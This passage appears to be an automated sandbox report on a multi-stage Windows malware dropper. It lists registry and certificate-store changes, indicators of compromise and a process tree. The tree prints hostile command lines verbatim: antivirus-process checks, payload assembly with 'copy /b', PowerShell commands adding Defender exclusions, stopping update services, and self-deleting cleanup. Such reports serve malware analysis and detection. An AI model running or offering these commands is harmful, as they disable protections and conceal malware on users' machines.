\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\NodeSlot = "7" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents" chrome.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 Organizational.pif Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a Organizational.pif Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 buildred.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 buildred.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6612 schtasks.exe 7080 schtasks.exe 5244 schtasks.exe 5368 schtasks.exe 9644 schtasks.exe 6476 schtasks.exe 8876 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 4772 first.exe 11476 explorer.exe 5920 Update.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2212 chrome.exe 2212 chrome.exe 3000 Predicted.pif 3000 Predicted.pif 3000 Predicted.pif 3000 Predicted.pif 3000 Predicted.pif 3000 Predicted.pif 5192 powershell.exe 5192 powershell.exe 5192 powershell.exe 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 5288 312026255.exe 5288 312026255.exe 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 5732 powershell.exe 5732 powershell.exe 5732 powershell.exe 6080 powershell.exe 6080 powershell.exe 6080 powershell.exe 1236 powershell.exe 1236 powershell.exe 1236 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 3184 inst77player.exe 3184 inst77player.exe 5136 41986531.exe 5136 41986531.exe 1140 3036535491.exe 1140 3036535491.exe 5704 powershell.exe 5704 powershell.exe 5704 powershell.exe 1140 3036535491.exe 1140 3036535491.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 4188 chrome.exe 5476 chrome.exe 2212 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe -
Suspicious behavior: SetClipboardViewer 4 IoCs
pid Process 672 sysppvrdnvs.exe 5652 sysklnorbcv.exe 3196 sysmablsvr.exe 7496 sysnldcvmr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1720 4363463463464363463463463.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeDebugPrivilege 760 tasklist.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeDebugPrivilege 1132 tasklist.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeBackupPrivilege 3092 frap.exe Token: SeSecurityPrivilege 3092 frap.exe Token: SeSecurityPrivilege 3092 frap.exe Token: SeSecurityPrivilege 3092 frap.exe Token: SeSecurityPrivilege 3092 frap.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 3000 Predicted.pif 3000 Predicted.pif 3000 Predicted.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 5772 Jurisdiction.pif 5772 Jurisdiction.pif 5772 Jurisdiction.pif 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 3184 inst77player.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 3000 Predicted.pif 3000 Predicted.pif 3000 Predicted.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 5772 Jurisdiction.pif 5772 Jurisdiction.pif 5772 Jurisdiction.pif 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe 1984 dwm.exe -
Suspicious use of SetWindowsHookEx 28 IoCs
pid Process 4188 chrome.exe 5476 chrome.exe 3184 inst77player.exe 3184 inst77player.exe 4052 XClient_protected.exe 5476 chrome.exe 3200 khtoawdltrha.exe 5476 chrome.exe 9336 Client.exe 11476 explorer.exe 11424 RegAsm.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 11476 explorer.exe 5476 chrome.exe 5476 chrome.exe 6664 Client1.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5920 Update.exe 5920 Update.exe 5476 chrome.exe 5476 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2212 wrote to memory of 1864 2212 chrome.exe 90 PID 2212 wrote to memory of 1864 2212 chrome.exe 90 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 3864 2212 chrome.exe 91 PID 2212 wrote to memory of 1692 2212 chrome.exe 92 PID 2212 wrote to memory of 1692 2212 chrome.exe 92 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 PID 2212 wrote to memory of 3944 2212 chrome.exe 93 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 7504 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3540
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\Files\seo.exe"C:\Users\Admin\AppData\Local\Temp\Files\seo.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2840 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Vote Vote.cmd & Vote.cmd & exit4⤵PID:2156
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:760
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:4940
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"5⤵PID:2968
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4195915⤵
- System Location Discovery: System Language Discovery
PID:3140
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "SAVEDBEDFLESHPROVIDED" Waves5⤵PID:3956
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Poll + ..\Memorabilia + ..\Kenny + ..\Rick + ..\Britannica + ..\Circuits J5⤵PID:4648
-
-
C:\Users\Admin\AppData\Local\Temp\419591\Predicted.pifPredicted.pif J5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3000 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\419591\Predicted.pif" & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit6⤵PID:2592
-
C:\Windows\SysWOW64\timeout.exetimeout /t 107⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1524
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:2716
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ldqj18tn.exe"C:\Users\Admin\AppData\Local\Temp\Files\ldqj18tn.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
PID:1796 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat4⤵PID:64
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:5952
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
- System Location Discovery: System Language Discovery
PID:5960
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:6000
-
-
C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵PID:6008
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7045795⤵PID:6052
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "MARTNMSPIDERRINGTONE" Mh5⤵PID:6068
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u5⤵
- System Location Discovery: System Language Discovery
PID:6140
-
-
C:\Users\Admin\AppData\Local\Temp\704579\Organizational.pifOrganizational.pif u5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4304 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\704579\Organizational.pif" & rd /s /q "C:\ProgramData\EGHCBKKKFHCG" & exit6⤵
- System Location Discovery: System Language Discovery
PID:5348 -
C:\Windows\SysWOW64\timeout.exetimeout /t 107⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3364
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:1292
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\s.exe"C:\Users\Admin\AppData\Local\Temp\Files\s.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3456 -
C:\Windows\sysvplervcs.exeC:\Windows\sysvplervcs.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
PID:5012 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵PID:2108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5192
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵PID:3832
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:5240
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5260
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5280
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5332
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5404
-
-
-
C:\Users\Admin\AppData\Local\Temp\312026255.exeC:\Users\Admin\AppData\Local\Temp\312026255.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5288 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:1112
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:5200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:5408
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:5276
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\391817420.exeC:\Users\Admin\AppData\Local\Temp\391817420.exe5⤵
- Executes dropped EXE
PID:5676
-
-
C:\Users\Admin\AppData\Local\Temp\132069246.exeC:\Users\Admin\AppData\Local\Temp\132069246.exe5⤵
- Executes dropped EXE
